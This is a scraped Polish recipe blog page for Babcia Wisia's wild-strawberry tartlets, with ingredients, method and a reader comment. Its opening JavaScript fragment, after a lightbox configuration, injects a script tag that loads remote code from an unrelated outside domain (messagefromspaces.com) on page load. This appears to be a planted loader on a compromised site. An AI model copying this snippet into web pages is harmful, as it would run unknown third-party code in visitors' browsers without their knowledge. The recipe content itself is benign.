, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Poziomkowe Babeczki Babci Wisi

Fritata z pomidorami i szczypiorkiem

Poziomkowe babeczki to jeden z ulubionych smaków dzieciństwa Taty. Kojarzą się z Przemyślem gdzie mieszka Babcia Wisia. Ponad 20 lat temu… Tata zrywał w ogródku poziomki do kubka, a gdy był już pełny pędził do Babci, która już babeczki wyciągnęła z pieca i zabierała się za ucieranie kremu.

Ciasto na babeczki

  • półtorej szklanki mąki pszennej
  • 1/4 szklanki cukru pudru
  • 2 żółtka
  • 12 dkg schłodzonego masła lub margaryny

Składniki na ciasto posiekać, szybko zagnieść i schłodzić w lodówce przez około godzinę. Potem rozwałkować i wykroić kółka i wypiekać babeczki przez około 15 min w 180 stopniach. Ja użyłam blaszki do wypieku muffinków – świetnie się sprawdziła.

Masa poziomkowa:

  • szklanka cukru drobnego
  • szklanka poziomek
  • białko

Składniki na masę miksujemy do uzyskania jednolitej, błyszczącej masy. Ja najpierw ubijałam białko, powoli dosypywałam cukier  a na końcu wrzuciłam poziomki. Po wypieczeniu babek wrzucamy doń krem poziomkowy i dekorujemy szczyt poziomą.

Wydrukuj artykuł Wydrukuj artykuł

Kategoria: Bez kategorii Jeden komentarz »

Jedna odpowiedź to “Poziomkowe Babeczki Babci Wisi”

  1. errr

    O MatkoGotuje! przenieś mnie do swojej krainy pyszności, albo wykupię i wyzbieram wszystkie poziomki w Twoim mieście!


Skomentuj...



Początek strony